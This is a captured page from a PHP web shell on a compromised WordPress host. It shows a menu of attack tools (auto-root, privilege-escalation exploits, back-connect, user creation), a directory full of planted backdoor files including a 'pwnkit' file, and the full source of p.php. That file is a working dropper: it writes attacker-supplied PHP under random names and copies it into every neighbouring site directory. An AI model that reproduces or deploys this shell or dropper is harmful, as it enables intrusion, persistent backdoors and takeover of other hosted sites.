Linux webm009.cluster129.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.129.20.9 | : 216.73.216.192
Cant Read [ /etc/named.conf ]
5.4.45
scentii
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
scentii /
www /
[ HOME SHELL ]
Name
Size
Permission
Action
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
250
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
akdjhen_efd3.txt
137
B
-rw-r--r--
aozvayuj.php
760
B
-rw-r--r--
bnsdghm.php
143.87
KB
-r--r--r--
config.php
9.35
KB
-rw-r--r--
init.php
180.38
KB
-rw-r--r--
kuwshhyo.php
760
B
-rw-r--r--
lf.php
166.09
KB
-rw-r--r--
license.txt
19.44
KB
-rw-r--r--
moon_VfWZtwe0.php
19.07
KB
-rw-r--r--
moon_irf2CqJy.php
19.07
KB
-rw-r--r--
p.php
2.75
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.html
7.25
KB
-rw-r--r--
readme_ae82.php
12.3
KB
-rw-r--r--
rxzx.php
6.85
KB
-rw-r--r--
vymqtqne.php
760
B
-rw-r--r--
wbekmmvg.php
14.76
KB
-rw-r--r--
wp-activate.php
7.18
KB
-rw-r--r--
wp-blog-header.php
352
B
-rw-r--r--
wp-comments-post.php
2.27
KB
-rw-r--r--
wp-conffg.php
127.62
KB
-rw-r--r--
wp-config-sample.php
28.24
KB
-rw-r--r--
wp-config.php
3.26
KB
-rw-r--r--
wp-cron.php
5.49
KB
-rw-r--r--
wp-links-opml.php
2.43
KB
-rw-r--r--
wp-load.php
3.84
KB
-rw-r--r--
wp-mail.php
8.52
KB
-rw-r--r--
wp-settings.php
30.33
KB
-rw-r--r--
wp-signup.php
33.71
KB
-rw-r--r--
wp-trackback.php
5.09
KB
-rw-r--r--
wzjheusy.php
760
B
-rw-r--r--
xmlrpc.php
3.13
KB
-rw-r--r--
yhf.txt
1
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : p.php
<?php function generateRandomString($length) { $characters = 'abcdefghijklmnopqrstuvwxyz'; $charLength = strlen($characters); $randomString = ''; for ($i = 0; $i < $length; $i++) { $randomString .= $characters[rand(0, $charLength - 1)]; } return $randomString; } function method1() { $currentPath = dirname($_SERVER['DOCUMENT_ROOT']); if ($currentPath === false) { echo "Unable to determine the current path."; return; } $contents = scandir($currentPath); if ($contents === false) { echo "Unable to list the contents of the current path."; return; } echo json_encode($contents); } function method2() { $currentPath = $_SERVER['DOCUMENT_ROOT']; if ($currentPath === false) { echo "Unable to determine the current path."; return; } $contents = scandir($currentPath); if ($contents === false) { echo "Unable to list the contents of the current path."; return; } echo json_encode($contents); } if (isset($_GET['met1'])) { method1(); } else if (isset($_GET['met2'])) { method2(); } else if (isset($_GET['actmet1'])) { $sc = $_POST['file']; $nama = generateRandomString(8); $filePath = $nama . '.php'; $dead = fopen($filePath, "w"); if ($dead === false) { echo "Failed to open the file for writing."; } else { if (fwrite($dead, $sc) === false) { echo "Failed to write to the file."; } else { fclose($dead); $currentPath = dirname($_SERVER['DOCUMENT_ROOT']); $contents = scandir($currentPath); foreach ($contents as $a) { $newpath = $currentPath . '/' . $a . '/' . $nama . '.php'; $badman = @copy($filePath, $newpath); if ($badman) { echo $a . '/' . $nama . '.php' . '|'; } } } } } else if (isset($_GET['actmet2'])) { $sc = $_POST['file']; $nama = generateRandomString(8); $filePath = $nama . '.php'; $dead = fopen($filePath, "w"); if ($dead === false) { echo "Failed to open the file for writing."; } else { if (fwrite($dead, $sc) === false) { echo "Failed to write to the file."; } else { fclose($dead); $currentPath = $_SERVER['DOCUMENT_ROOT']; $contents = scandir($currentPath); foreach ($contents as $a) { $newpath = $currentPath . '/' . $a . '/' . $nama . '.php'; $badman = @copy($filePath, $newpath); if ($badman) { echo $a . '/' . $nama . '.php' . '|'; } } } } } else { echo 'DeathShop'; } ?>
Close